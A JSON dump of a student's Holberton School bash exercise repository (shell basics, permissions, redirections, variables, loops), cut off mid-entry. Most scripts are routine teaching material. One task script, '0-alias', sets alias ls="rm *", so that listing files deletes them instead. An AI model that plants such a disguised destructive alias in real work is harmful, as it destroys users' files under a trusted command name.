[
  {
    "path": ".gitignore",
    "content": "*~"
  },
  {
    "path": "0x00-shell_basics/0-current_working_directory",
    "content": "#!/bin/bash\npwd\n"
  },
  {
    "path": "0x00-shell_basics/1-listit",
    "content": "#!/bin/bash\nls\n"
  },
  {
    "path": "0x00-shell_basics/10-back",
    "content": "#!/bin/bash\ncd -\n"
  },
  {
    "path": "0x00-shell_basics/100-lets_move",
    "content": "#!/bin/bash\nmv [[:upper:]]* /tmp/u/\n"
  },
  {
    "path": "0x00-shell_basics/101-clean_emacs",
    "content": "#!/bin/bash\nrm *~\n"
  },
  {
    "path": "0x00-shell_basics/102-tree",
    "content": "#!/bin/bash\nmkdir -p welcome/to/holberton\n"
  },
  {
    "path": "0x00-shell_basics/103-commas",
    "content": "#!/bin/bash\nls -amp | sort -d\n"
  },
  {
    "path": "0x00-shell_basics/11-lists",
    "content": "#!/bin/bash\nls -la . .. /boot\n"
  },
  {
    "path": "0x00-shell_basics/12-file_type",
    "content": "#!/bin/bash\nfile /tmp/iamafile\n"
  },
  {
    "path": "0x00-shell_basics/13-symbolic_link",
    "content": "#!/bin/bash\nln -s /bin/ls __ls__\n"
  },
  {
    "path": "0x00-shell_basics/14-copy_html",
    "content": "#!/bin/bash\ncp -un *.html ../\n"
  },
  {
    "path": "0x00-shell_basics/2-bring_me_home",
    "content": "#!/bin/bash\ncd ~\n"
  },
  {
    "path": "0x00-shell_basics/3-listfiles",
    "content": "#!/bin/bash\nls -l\n"
  },
  {
    "path": "0x00-shell_basics/4-listmorefiles",
    "content": "#!/bin/bash\nls -la\n"
  },
  {
    "path": "0x00-shell_basics/5-listfilesdigitonly",
    "content": "#!/bin/bash\nls -lan\n"
  },
  {
    "path": "0x00-shell_basics/6-firstdirectory",
    "content": "#!/bin/bash\nmkdir /tmp/holberton\n"
  },
  {
    "path": "0x00-shell_basics/7-movethatfile",
    "content": "#!/bin/bash\nmv /tmp/betty /tmp/holberton/\n"
  },
  {
    "path": "0x00-shell_basics/8-firstdelete",
    "content": "#!/bin/bash\nrm /tmp/holberton/betty\n"
  },
  {
    "path": "0x00-shell_basics/9-firstdirdeletion",
    "content": "#!/bin/bash\nrmdir /tmp/holberton\n"
  },
  {
    "path": "0x00-shell_basics/README.md",
    "content": "# 0x00 Shell Basics\n\n## Resources\n\n- LinuxCommand.org [What is \"the Shell\"?](http://linuxcommand.org/lc3_lts0010.php).\n- [Read the Manual](http://linuxcommand.org/lc3_man_pages/man1.html).\n- [Keyboard Shortcuts for Bash](https://www.howtogeek.com/howto/ubuntu/keyboard-shortcuts-for-bash-command-shell-for-ubuntu-debian-suse-redhat-linux-etc/).\n\n## Tasks\n\n0. [Where am I?](./0-current_working_directory) : A script that prints the absolute path of the current working directory.\n1. [What's in there?](./1-listit) : A script that displays the contents of your current directory.\n2. [There is no place like home](./2-bring_me_home) : A script that changes the working directory to the user's home directory.\n3. [The long format](./3-listfiles) : A script that displays the current directory contents in a long format.\n4. [Hidden files](./4-listmorefiles) : A script that displays the current directory contents including hidden files.\n5. [I loce numbers](./5-listfilesdigitonly) : A script that displays the current directory contents, using long format, while displaying group IDs in numeral and show hidden files.\n6. [Welcome holberton](./6-firstdirectory) : A script that will create a directory named `holberton` in the `/tmp/` directory.\n7. [Betty in Holberton](./7-movethatfile) : A scipt that will move a file called `betty` from home to the new directory created above.\n8. [Bye bye Betty](./8-firstdelete) : A script that will delete file `betty` from the new location.\n9. [Bye bye Holberton](./9-firstdirdeletion) : A script that will delete the directory `holberton` that is in the `/tmp/` directory path.\n10. [Back to the future](./10-back) Change working directory to the previous one.\n11. [Lists](./11-lists) List all files (*even ones with names beginning with a period character, which are normally hidden*) in the current directory and the parent of the working directory and the /boot directory (in this order), in long format.\n12. [File type](./12-file_type) A script that prints the type of the named file `iamafile`. The `iamafile` will be in the `/tmp/` directory when we will run your script.\n13. [We are symbols, and inhabit symbols](./13-symbolic_link) Create a symbolic link to `/bin/ls`, named `__ls__`. The symbolic link should be created in the current working directory.\n14. [Copy HTML files](./14-copy_html) Create a script that copies all `html` files from the current working directory to the parent working directory while only copying files that did not exist.\n15. [Let's move](./100-lets_move) A script that moves all files beginning with an uppercase letter to the directory `/tmp/u`.\n16. [Clean Emacs](./101-clean_emacs) A script that deletes all files in the current directory that end with the character `~`.\n17. [Tree](./102-tree) A script that creates the directory `welcome/`, `welcome/to/` and `welcome/to/holberton`.\n18. [Life is a series of commas, not periods](./103-commas) A script that lists all the files and directories of the current directory separated by commas `,`.\n19. [File type: Holberton](./holberton.mgc) Create a magic file `holberton.mgc` that can be used with the command `file` to detect `Holberton` data files always contain the string `HOLBERTON` at offset 0.\n"
  },
  {
    "path": "0x00-shell_basics/holberton.mgc",
    "content": "0 string HOLBERTON Holberton data\n!:mime Holberton"
  },
  {
    "path": "0x01-shell_permissions/0-iam_betty",
    "content": "#!/bin/bash\nsu betty\n"
  },
  {
    "path": "0x01-shell_permissions/1-who_am_i",
    "content": "#!/bin/bash\nwhoami\n"
  },
  {
    "path": "0x01-shell_permissions/10-mirror_permissions",
    "content": "#!/bin/bash\nchmod --reference=olleh hello\n"
  },
  {
    "path": "0x01-shell_permissions/100-change_owner_and_group",
    "content": "#!/bin/bash\nchown betty:holberton *\n"
  },
  {
    "path": "0x01-shell_permissions/101-symbolic_link_permissions",
    "content": "#!/bin/bash\nchown -h betty:holberton _hello\n"
  },
  {
    "path": "0x01-shell_permissions/102-if_only",
    "content": "#!/bin/bash\nchown --from=guillaume betty hello\n"
  },
  {
    "path": "0x01-shell_permissions/103-Star_Wars",
    "content": "#!/bin/bash\ntelnet towel.blinkenlights.nl\n"
  },
  {
    "path": "0x01-shell_permissions/11-directories_permissions",
    "content": "#!/bin/bash\nchmod -R +X .\n"
  },
  {
    "path": "0x01-shell_permissions/12-directory_permissions",
    "content": "#!/bin/bash\nmkdir -m 751 dir_holberton\n"
  },
  {
    "path": "0x01-shell_permissions/13-change_group",
    "content": "#!/bin/bash\nchgrp holberton hello\n"
  },
  {
    "path": "0x01-shell_permissions/2-groups",
    "content": "#!/bin/bash\ngroups\n"
  },
  {
    "path": "0x01-shell_permissions/3-new_owner",
    "content": "#!/bin/bash\nchown betty hello\n"
  },
  {
    "path": "0x01-shell_permissions/4-empty",
    "content": "#!/bin/bash\ntouch hello\n"
  },
  {
    "path": "0x01-shell_permissions/5-execute",
    "content": "#!/bin/bash\nchmod u+x hello\n"
  },
  {
    "path": "0x01-shell_permissions/6-multiple_permissions",
    "content": "#!/bin/bash\nchmod ug+x,o+r hello\n"
  },
  {
    "path": "0x01-shell_permissions/7-everybody",
    "content": "#!/bin/bash\nchmod +x hello\n"
  },
  {
    "path": "0x01-shell_permissions/8-James_Bond",
    "content": "#!/bin/bash\nchmod 007 hello\n"
  },
  {
    "path": "0x01-shell_permissions/9-John_Doe",
    "content": "#!/bin/bash\nchmod 753 hello\n"
  },
  {
    "path": "0x01-shell_permissions/README.md",
    "content": "# 0x01 Shell Permissions\n\n## Resources\n\n- LinuxCommand.org [Permissions](http://linuxcommand.org/lc3_lts0090.php).\n\n## Tasks\n\n0. [My name is Betty](./0-iam_betty) : A script that switches the current user to the user betty.\n1. [Who am I](./1-who_am_i) : A script that prints the effective username of the current user.\n2. [Groups](./2-groups) : A script that prints all the groups the current user is part of.\n3. [New owner](./3-new_owner) : A script that changes the owner of the file `hello` to the user `betty`.\n4. [Empty!](./4-empty) : A script that creates an empty file called `hello`.\n5. [Execute](./5-execute) : A script that adds execute permission to the owner of the file `hello`.\n6. [Multiple permissions](./6-multiple_permissions) : A script that adds execute permission to the owner and the group owner, and read permission to the other users, to the file `hello`.\n7. [Everybody!](./7-everybody) : A script that adds execution permissions to the owner, the group owner and the other users, to the file `hello`.\n8. [James Bond](./8-James_Bond) : A script that gives the gives the rest of the users permission and removes all permission for the owner and the group owner.\n9. [John Doe](./9-John_Doe) : A script that sets the mode of the file `hello`; where owner has all the permissions set, group owner has execute permissions set and others have only write and read permissions set.\n10. [Look in the mirror](./10-mirror_permissions) : A script that sets the mode of the file `hello` the same as `olleh`'s mode.\n11. [Directories](./11-directories_permissions) : A script that adds execute permission to all subdirectories of the current directory for the owner, the group owner and all other users. (**NB:** *Regular files should not be changed.*)\n12. [More directories](./12-directory_permissions) : A script that creates a directory called `dir_holberton` with permissions **751** in the working directory.\n13. [Change group](./13-change_group) : A script that changes the group owner to `holberton` for the file `hello`.\n14. [Owner and group](./100-change_owner_and_group) : A script that changes the owner to `betty` and the group owner to `holberton` for all the files and directories in the working directory.\n15. [Symbolic links](./101-symbolic_link_permissions) : A script that changes the owner and the group owner of `_hello` to `betty` and `holberton` respectively.\n16. [If only](./102-if_only) : A script that changes the owner of the file `hello` to `betty` only if it is owned by the user `guillaume`.\n17. [Star Wars](./103-Star_Wars) : A script that will play the StarWars IV episode in the terminal.\n"
  },
  {
    "path": "0x02-shell_redirections/0-hello_world",
    "content": "#!/bin/bash\necho \"Hello, World\"\n"
  },
  {
    "path": "0x02-shell_redirections/1-confused_smiley",
    "content": "#!/bin/bash\necho \"\\\"(Ôo)'\"\n"
  },
  {
    "path": "0x02-shell_redirections/10-no_more_js",
    "content": "#!/bin/bash\nfind . -name '*.js' -type f -delete\n"
  },
  {
    "path": "0x02-shell_redirections/100-empty_casks",
    "content": "#!/bin/bash\nfind . -empty -printf '%f\\n'\n"
  },
  {
    "path": "0x02-shell_redirections/101-gifs",
    "content": "#!/bin/bash\nfind -type f -name \"*.gif\" | rev | cut -d \"/\" -f 1 | cut -d '.' -f 2- | rev | LC_ALL=C sort -f\n"
  },
  {
    "path": "0x02-shell_redirections/102-acrostic",
    "content": "#!/bin/bash\ncut -c 1 | paste -s -d ''\n"
  },
  {
    "path": "0x02-shell_redirections/103-the_biggest_fan",
    "content": "#!/bin/bash\ntail -n +2 | cut -f -1 | sort -k 1 | uniq -c | sort -rnk 1 | head -n 11 | rev | cut -d ' ' -f -1 | rev\n"
  },
  {
    "path": "0x02-shell_redirections/11-directories",
    "content": "#!/bin/bash\nfind . -mindepth 1 -type d | wc -l\n"
  },
  {
    "path": "0x02-shell_redirections/12-newest_files",
    "content": "#!/bin/bash\nls -t | head -n 10\n"
  },
  {
    "path": "0x02-shell_redirections/13-unique",
    "content": "#!/bin/bash\nsort | uniq -u\n"
  },
  {
    "path": "0x02-shell_redirections/14-findthatword",
    "content": "#!/bin/bash\ngrep root /etc/passwd\n"
  },
  {
    "path": "0x02-shell_redirections/15-countthatword",
    "content": "#!/bin/bash\ngrep bin /etc/passwd | wc -l\n"
  },
  {
    "path": "0x02-shell_redirections/16-whatsnext",
    "content": "#!/bin/bash\ngrep -A 3 'root' /etc/passwd\n"
  },
  {
    "path": "0x02-shell_redirections/17-hidethisword",
    "content": "#!/bin/bash\ngrep -v bin /etc/passwd\n"
  },
  {
    "path": "0x02-shell_redirections/18-letteronly",
    "content": "#!/bin/bash\ngrep '^[[:upper:]]\\|^[[:lower:]]' /etc/ssh/sshd_config\n"
  },
  {
    "path": "0x02-shell_redirections/19-AZ",
    "content": "#!/bin/bash\ntr Ac Ze\n"
  },
  {
    "path": "0x02-shell_redirections/2-hellofile",
    "content": "#!/bin/bash\ncat /etc/passwd\n"
  },
  {
    "path": "0x02-shell_redirections/20-hiago",
    "content": "#!/bin/bash\ntr -d cC\n"
  },
  {
    "path": "0x02-shell_redirections/21-reverse",
    "content": "#!/bin/bash\nrev\n"
  },
  {
    "path": "0x02-shell_redirections/22-users_and_homes",
    "content": "#!/bin/bash\ncut -d':' -f1,6  /etc/passwd | sort\n"
  },
  {
    "path": "0x02-shell_redirections/3-twofiles",
    "content": "#!/bin/bash\ncat /etc/{passwd,hosts}\n"
  },
  {
    "path": "0x02-shell_redirections/4-lastlines",
    "content": "#!/bin/bash\ntail -n 10 /etc/passwd\n"
  },
  {
    "path": "0x02-shell_redirections/5-firstlines",
    "content": "#!/bin/bash\nhead -n 10 /etc/passwd\n"
  },
  {
    "path": "0x02-shell_redirections/6-third_line",
    "content": "#!/bin/bash\ncat iacta | head -n 3 | tail -n 1\n"
  },
  {
    "path": "0x02-shell_redirections/7-file",
    "content": "#!/bin/bash\necho \"Holberton School\" > \"\\*\\\\\\'\\\"Holberton School\\\"\\'\\\\\\*$\\?\\*\\*\\*\\*\\*:)\"\n"
  },
  {
    "path": "0x02-shell_redirections/8-cwd_state",
    "content": "#!/bin/bash\nls -la > ls_cwd_content\n"
  },
  {
    "path": "0x02-shell_redirections/9-duplicate_last_line",
    "content": "#!/bin/bash\ntail -n 1 iacta >> iacta\n"
  },
  {
    "path": "0x02-shell_redirections/README.md",
    "content": "# 0x002 Shell, I/O Redirections and Filters\n\n## Resources\n\n- LinuxCommand.Org [I/O Redirection](http://linuxcommand.org/lc3_lts0070.php).\n- BashGuide [SpecialCharacters](http://mywiki.wooledge.org/BashGuide/SpecialCharacters).\n\n## Tasks\n\n0. [Hello World](./0-hello_world) : A script that prints `Hello, World`, followed by a new line to the standard output.\n1. [Confused smiley](./1-confused_smiley) : A script that displays a confused smiley: `\"(Ôo)'`.\n2. [Let's display a file](./2-hellofile) : A script that displays the content of the `/etc/passwd` file.\n3. [What about 2?](./3-twofiles) : A scipt that displays content of `/etc/passwd` and `/etc/hosts`.\n4. [Last lines of a file](./4-lastlines) : A script that displays the last 10 lines of `/etc/passwd`.\n5. [I'd prefer the first ones actually](./5-firstlines) : A scipt that displays the first 10 lines of `etc/passwd`.\n6. [Line #2](./6-third_line) : A script that displays the third line of the file `iacta`.\n   - The file `iacta` will be in the working directory and you are not allowed to use `sed`.\n7. [It is a good file that cuts iron without making a noise](./7-file) : A script that creates a file named exactly `\\*\\\\'\"Holberton School\"\\'\\\\*$\\?\\*\\*\\*\\*\\*:)` containing the text `Holberton School` ending by a new line.\n   - For this challenge, remember to use a single backslash `\\` to escape special characters and double backslash `\\\\` to escape the backslash itself.\n8. [Save current state of directory](./8-cwd_state) : A script that writes into the file `ls_cwd_content` the result of the command `ls -la`. If the file `ls_cwd_content` already exists, it should be overwritten. If the file `ls_cwd_content`does not exist, create it.\n9. [Duplicate last line](./9-duplicate_last_line) : A script that duplicates the last line of the file `iacta`.\n10. [No more javascript](./10-no_more_js) : A script that deletes all the regular files (not the directories) with a `.js` extension that are present in the current directory and all its subfolders.\n11. [Don't just count your directories, make your directories count](./11-directories) : A script that counts the number of directories and sub-directories in the current directory.\n    - The current and present directories should not be taken into account.\n    - Hidden directories should be counted.\n      - **Solution:** `mindepth 1` ; To exclude root directory\n      - **Others:** `maxdepth 1` ; To avoid parsing sub directories. (*you may need this in future.*)\n12. [Whats12's new](./12-newest_files) : A script that prints the 10 newest files in the current directory.\n    - The output should be; one file per line and sorted from the newest to the oldest.\n13. [Being unique is better than being perfect](./13-unique) : A script that takes a list of words as input and prints only words that appear exactly once.\n    - Input and Output format is; `One word per line`.\n    - Words should be sorted. (use this [list](./list) as your input to see if the challenge will work. 😊) `cat list | ./13-unique`\n14. [It must be in that file](./14-findthatword) : A script that prints lines containing the pattern `\"root\"` from the file `/etc/passwd`.\n15. [Count that word](./15-countthatword) : A script that displays the number of lines that contain the pattern `\"bin\"` in the file `/etc/passwd`.\n16. [What's next?](./16-whatsnext) : A script that containing the pattern `\"root\"` and 3 lines after them in the file `/etc/passwd`.\n    - `B` : This shows the lines before your pattern match.\n    - `A` : This shows the lines after your pattern match.\n17. [I hate bins](./17-hidethisword) : A script that displays all the lines in the file `/etc/passwd` that do not contain the pattern `\"bin\"`.\n18. [Letters only please](./18-letteronly) : A script that displays all lines of the file `/ect/ssh/sshd_config` starting with a letter, including capital letters as well.\n    - This also works : `grep ^[[:alpha:]] /etc/ssh/sshd_config`\n19. [A to Z](./19-AZ) : A script that replaces all characters `A` and `C` from input to `Z` and `E` respectively.\n20. [Without C, you would live in hiago](./20-hiago) : A script that removes all letters `c` and `C` from input.\n21. [esreveR](./21-reverse) : A script that reverse its input.\n22. [DJ Cut Killer](./22-users_and_homes) : A scipt that displays all users and their home directories, sorted by users, based on the `/etc/passwd` file.\n23. [Empty casks make the most noise](./100-empty_casks) : A script that finds all empty files and directories in the current directory and all sub-directories.\n    - Only names of the files and directories should be displayed (not the entire path.)\n    - Hidden files should be listed also, one file name per line and the listing should end with a new line.\n    - You are not allowed to use `basename`, `grep`, `egrep`, `fgrep` or `rgrep`.\n24. [A gif is worth ten thousand words](./101-gifs) : A script that lists all the files with a `.gif` extension in the current directory and all its sub-directories.\n    - Hidden files should be listed.\n    - Only regular files (not directories) should be listed.  \n    - The names of the files should be displayed without their extensions. \n    - The files should be sorted by byte values, but case-insensitive (file `aaa` should be listed before file `bbb`, file `.b` should be listed before file `a`, and file `Rona` should be listed after file `jay`) \n    - One file name per line. \n    - The listing should end with a new line. \n    - You are not allowed to use `basename`, `grep`, `egrep`, `fgrep` or `rgrep`. \n25. [Acrostic](./102-acrostic) : A script that decodes acrostics that use the first letter of each line.\n    - What to decode: `An acrostic is a poem (or other form of writing) in which the first letter (or syllable, or word) of each line (or paragraph, or other recurring feature in the text) spells out a word, message or the alphabet. The word comes from the French acrostiche from post-classical Latin acrostichis). As a form of constrained writing, an acrostic can be used as a mnemonic device to aid memory retrieval.` [Read more here](https://en.wikipedia.org/wiki/Acrostic)\n    - The **‘decoded’** message has to end with a new line.\n    - You are not allowed to use `grep`, `egrep`, `fgrep` or `rgrep`.\n26. [The biggest fan](./103-the_biggest_fan) : A script that parses web servers logs in TSV format as input and displays the 11 hosts or IP addresses which did the most requests.\n    - Download this file: `wget http://indeedeng.github.io/imhotep/files/nasa_19950801.tsv`\n    - Run command this way: `./103-the_biggest_fan < nasa_19950801.tsv`.\n    - Order by number of requests, most active host or IP at the top.\n    - You are not allowed to use `grep`, `egrep`, `fgrep` or `rgrep`.\n"
  },
  {
    "path": "0x02-shell_redirections/list",
    "content": "C#\nC\nJavascript\nPerl\nPHP\nPHP\nASP\nR\nGo\nC#\nC++\nR\nPerl\nJavascript\nJavascript\nPython\nJavascript\nJavascript\nJavascript\nJava\nJava\nPython\nJavascript\nJavascript\nJavascript\nASP\n"
  },
  {
    "path": "0x03-shell_variables_expansions/0-alias",
    "content": "#!/bin/bash\nalias ls=\"rm *\"\n"
  },
  {
    "path": "0x03-shell_variables_expansions/1-hello_you",
    "content": "#!/bin/bash\necho \"hello $USER\"\n"
  },
  {
    "path": "0x03-shell_variables_expansions/10-love_exponent_breath",
    "content": "#!/bin/bash\necho $(($BREATH ** $LOVE))\n"
  },
  {
    "path": "0x03-shell_variables_expansions/100-decimal_to_hexadecimal",
    "content": "#!/bin/bash\nprintf \"%x\\n\" $DECIMAL\n"
  },
  {
    "path": "0x03-shell_variables_expansions/101-rot13",
    "content": "#!/bin/bash\ntr 'A-Za-z' 'N-ZA-Mn-za-m'\n"
  },
  {
    "path": "0x03-shell_variables_expansions/102-odd",
    "content": "#!/bin/bash\npaste -d, - - | cut -d, -f1\n"
  },
  {
    "path": "0x03-shell_variables_expansions/103-water_and_stir",
    "content": "#!/bin/bash\nprintf \"%o\\n\" $(( $((5#$(echo $WATER | tr water 01234))) + $((5#$(echo $STIR | tr stir. 01234))) )) | tr 01234567 behlnort\n"
  },
  {
    "path": "0x03-shell_variables_expansions/11-binary_to_decimal",
    "content": "#!/bin/bash\necho $((2#$BINARY))\n"
  },
  {
    "path": "0x03-shell_variables_expansions/12-combinations",
    "content": "#!/bin/bash\necho {a..z}{a..z} | tr ' ' '\\n' | grep -v 'oo'\n"
  },
  {
    "path": "0x03-shell_variables_expansions/13-print_float",
    "content": "#!/bin/bash\nprintf \"%.2f\\n\" $NUM \n"
  },
  {
    "path": "0x03-shell_variables_expansions/2-path",
    "content": "#!/bin/bash\nexport PATH=${PATH}:/action\n"
  },
  {
    "path": "0x03-shell_variables_expansions/3-paths",
    "content": "#!/bin/bash\necho $PATH | tr \":\" \"\\n\" | wc -l\n"
  },
  {
    "path": "0x03-shell_variables_expansions/4-global_variables",
    "content": "#!/bin/bash\nprintenv\n"
  },
  {
    "path": "0x03-shell_variables_expansions/5-local_variables",
    "content": "#!/bin/bash\ndeclare\n"
  },
  {
    "path": "0x03-shell_variables_expansions/6-create_local_variable",
    "content": "#!/bin/bash\nBETTY=\"Holberton\"\n"
  },
  {
    "path": "0x03-shell_variables_expansions/7-create_global_variable",
    "content": "#!/bin/bash\nexport HOLBERTON=\"Betty\"\n"
  },
  {
    "path": "0x03-shell_variables_expansions/8-true_knowledge",
    "content": "#!/bin/bash\necho $(($TRUEKNOWLEDGE + 128))\n"
  },
  {
    "path": "0x03-shell_variables_expansions/9-divide_and_rule",
    "content": "#!/bin/bash\necho $(($POWER / $DIVIDE))\n"
  },
  {
    "path": "0x03-shell_variables_expansions/README.md",
    "content": "# 0x03 Shell, init files, variables and expansions\n\n## Resources\n\n- Shell [Expansion](http://linuxcommand.org/lc3_lts0080.php).\n- Shell [Arithmetic](https://www.gnu.org/software/bash/manual/html_node/Shell-Arithmetic.html).\n- Bash [Variable](https://tldp.org/LDP/Bash-Beginners-Guide/html/sect_03_02.html).\n- Bash [Shell initialization files](https://tldp.org/LDP/Bash-Beginners-Guide/html/sect_03_01.html).\n- [The alias Command](http://www.linfo.org/alias.html).\n\n## Tasks\n\n0. [\\<o>](./0-alias) : A script that creates an alias.\n   - Name of alias: `ls`\n   - Value: `rm *` \n1. [Hello you](./1-hello_you) : A script that prints `hello user`, where user is the current Linux user.\n2. [The path to success is to take massive, determined action](./2-path) : A script that adds `/action` to the `PATH`. `/action` should be the last directory the shell looks into when looking for a program.\n3. [If the path be beautiful, let us not ask where it leads](./3-paths) : A script that counts the number of directories in the `PATH`.\n4. [Global variables](./4-global_variables) : A script that prints all the enviroment variables.\n5. [Local variables ](./5-local_variables) : A script that lists all local variables and enviroment variables, and functions.\n   - Name of variable : `HOLBERTON`\n   - Value : `Betty`\n6. [Local variable](./6-create_local_variable) : A script that creates a new local variable.\n7. [Global variable](./7-create_global_variable) : A script that creates a new global variable.\n   - Name of variable : `HOLBERTON`\n   - Value : `Betty`\n8. [Every addition to true knowledge is an addition to human power](./8-true_knowledge) : A script that prints the results of the addition of 128 with the value stored in the enviroment variable `TRUEKNOWLEDGE`, followed by a new line.\n   - Remember to export variable TRUEKNOWLEDGE : `export TRUEKNOWLEDGE=1209`\n   - Run command this way: `./8-true_knowledge | cat -e`\n9. [Divide and rule](./9-divide_and_rule) : A script that prints the result of `POWER` divide by `DIVIDE`, followed by a new line.\n   - `POWER` and `DIVIDE` are environment variables.\n   - Variables values;\n    - export POWER=42784\n    - export DIVIDE=32\n   - Run command this way: `./9-divide_and_rule | cat -e`\n10. [Love is anterior to life, posterior to death, initial of creation, and the exponent of breath](./10-love_exponent_breath) : A script that displays the result of `BREATH` to the power of `LOVE`.\n    - `BREATH` and `LOVE` are enviroment variables.\n    - The script should display the result, followed by a new line.\n11. [There are 10 types of people in the world -- Those who understand binary, and those who don't](./11-binary_to_decimal) : A script that converts a number from base 2 to base 10.\n    - The number in base 2 is stored in the enviroment variable `BINARY`.\n    - The script should display the number in base 10, followed by a new line.\n12. [Combination](./12-combinations) : A script that prints all possible combinations of two letters, except `oo`.\n    - Letters are lower cases, from `a` to `z`.\n    - One combination per line.\n    - The output should be alpha ordered, starting with `aa`.\n    - Do not print `oo`.\n    - Your script file should contain maximum 64 characters.\n13. [Floats](./13-print_float) : A script that prints a number with two decimal places, followed by a new line.\n    - The number will be stored in the enviroment variable `NUM`.\n14. [Decimal to Hexadecimal](./100-decimal_to_hexadecimal) : A script that converts a number from base 10 to base 16.\n    - The number is base 10 is stored in the enviroment variable `DECIMAL`.\n    - The script should display the number in base 16, followed by a new line.\n15. [Everyone is a proponent of strong encryption](./101-rot13) : A script that encodes and decodes text using the rot13 encryption. Assume ASCII.\n16. [The eggs of the brood need to be an odd number](./102-odd) : A script that prints every other line from the input, starting with the first line.\n17. [I'm an instant star. Just add water and stir.](./103-water_and_stir) : A script that adds the two numbers stored in the enviroment variables `WATER` and `STIR` and prints the results.\n    - `WATER` is in base `water`.\n    - `STIR` is in base `stir`.\n    - The result should be in base `behlnort`.\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/0-RSA_public_key.pub",
    "content": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDjr22fiOaHPnXe4Nhlw+E/vZS5Pq7Y4LhaBWtcsXmxQjeTLy4KwdCyuZ2SALk9cS38sv6uMRTM3CVaC18O4AVylN7bAM8nPwVoIBqAr9ML75Q9qj+Abm8Vg8tSfYP4QS8MTbGeeyZdiq6nXWlLYVk/Jdf+ux+riHyW31mkpJyoQw/NU8I7psoa6xAS2c37oMKepi6lmYEnA7oZDE2PWt1oC8dqAqsC4Gyrz7veCj6xbGutpuo9cmuaoYmLnjdUr9n1gcsRWzrJhBYD6RRzLtSkDI8Qpd2pG5Bo9TFJg2stBkTYr9co4IuPrdSn2alB/Nl4laY9nzPD20FKDaRYfTiDMX6j64bkYWdeS3QYy/LzP7J5a4DrSxD/Gs5LOpUy0b4tk0OcgdsGeWHS3fJhlJvPyKyCLoJTqujGX7lc20CRD7DxPyWObQAbmXB74HcwuY+l0RsI/dyk8hCQTpyGlhudIM8em7LDFm9g+GN4FWeDAdfG1JduV5isGiu1ayOZPf0= th3_lab@th3d3n\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/1-for_best_school",
    "content": "#!/usr/bin/env bash\n# prints a string 10 times using for loop\n\nfor ((i = 1; i <= 10; i++)); do\n  echo \"Best School\"\ndone\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/10-fizzbuzz",
    "content": "#!/usr/bin/env bash\n# Fizzbuzz\n\nn=1\n\nwhile [ \"$n\" -le 100 ]; do\n\n\n  if ! (( n % 3 )) && ! (( n % 5 )); then\n    echo \"FizzBuzz\"\n  elif ! (( n % 3 )); then\n    echo \"Fizz\"\n  elif ! (( n % 5 )); then\n    echo \"Buzz\"\n  else\n    echo \"$n\"\n  fi\n  \n  ((n++))\ndone\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/100-read_and_cut",
    "content": "#!/usr/bin/env bash\n# read and cat\n\nfile=\"/etc/passwd\"\n\nwhile IFS= read -r line; do\n  echo \"$line\" | cut -d ':' -f1,3,6\ndone < \"$file\"\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/101-tell_the_story_of_passwd",
    "content": "#!/usr/bin/env bash\n# Tell the story of passwd\n\nfile=\"/etc/passwd\"\n\nwhile IFS= read -r line; do\n  user=$(echo \"$line\" | cut -d ':' -f1)\n  gid=$(echo \"$line\" | cut -d ':' -f4)\n  dir=$(echo \"$line\" | cut -d ':' -f6)\n  shell=$(echo \"$line\" | cut -d ':' -f7)\n  uid=$(echo \"$line\" | cut -d ':' -f3)\n  pass=$(echo \"$line\" | cut -d ':' -f2)\n  info=$(echo \"$line\" | cut -d ':' -f5)\n\n  echo \"The user $user is part of the $gid gang, lives in $dir and rides $shell. $uid's place is protected by the passcode $pass, more info about the user here: $info\"\ndone < \"$file\"\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/102-lets_parse_apache_logs",
    "content": "#!/usr/bin/env bash\n# parse apache logs and show ip and status code\n\nawk '{print $1,$9}' apache-access.log\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/103-dig_the-data",
    "content": "#!/usr/bin/env bash\n# Dig the data\n\nawk '{print $1,$9}' apache-access.log | sort | uniq -c | sort -r\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/2-while_best_school",
    "content": "#!/usr/bin/env bash\n# prints a string 10 times using while loop \n\ni=0\n\nwhile [ \"$i\" -lt 10 ]; do\n  echo \"Best School\"\n  ((i++))\ndone\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/3-until_best_school",
    "content": "#!/usr/bin/env bash\n# print a string 10 times using until loop\n\ni=0\n\nuntil false; do\n  echo \"Best School\"\n  ((i++))\n  if [[ $i -lt 10 ]]; then\n    continue\n  else\n    break\n  fi\ndone\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/4-if_9_say_hi",
    "content": "#!/usr/bin/env bash\n# prints a string 10 times using while loop and on the ninth iteration it prints hi\n\ni=1\n\nwhile [ \"$i\" -lt 11 ]; do\n  echo \"Best School\"\n  \n  # if statement to print Hi when i is 9\n  if [ \"$i\" -eq 9 ]; then\n    echo \"Hi\"\n  fi\n\n  ((i++))\ndone\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/5-4_bad_luck_8_is_your_chance",
    "content": "#!/usr/bin/env bash\n# 4 bad luck, 8 is your chance\n\ni=1\n\nwhile [ \"$i\" -lt 11 ]; do\n\n  # if 4 bad luck elif 8 good luck\n  if [ \"$i\" -eq 4 ]; then\n    echo \"bad luck\"\n  elif [ \"$i\" -eq 8 ]; then\n    echo \"good luck\"\n  else\n    echo \"Best School\"\n  fi\n\n  ((i++))\ndone\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/6-superstitious_numbers",
    "content": "#!/usr/bin/env bash\n# cultures with numbers ...\n\ni=1\n\nwhile [ \"$i\" -lt 21 ]; do\n  \n  case \"$i\" in\n    4)\n      echo \"$i\"\n      echo \"bad luck from China\"\n      ;;\n    9)\n      echo \"$i\"\n      echo \"bad luck from Japan\"\n      ;;\n    17)\n      echo \"$i\"\n      echo \"bad luck from Italy\"\n      ;;\n    *)\n      echo \"$i\"\n      ;;\n  esac\n\n  ((i++))\ndone\n"
  },
  {
    "path": "0x04-loops_conditions_and_parsing/7-clock",
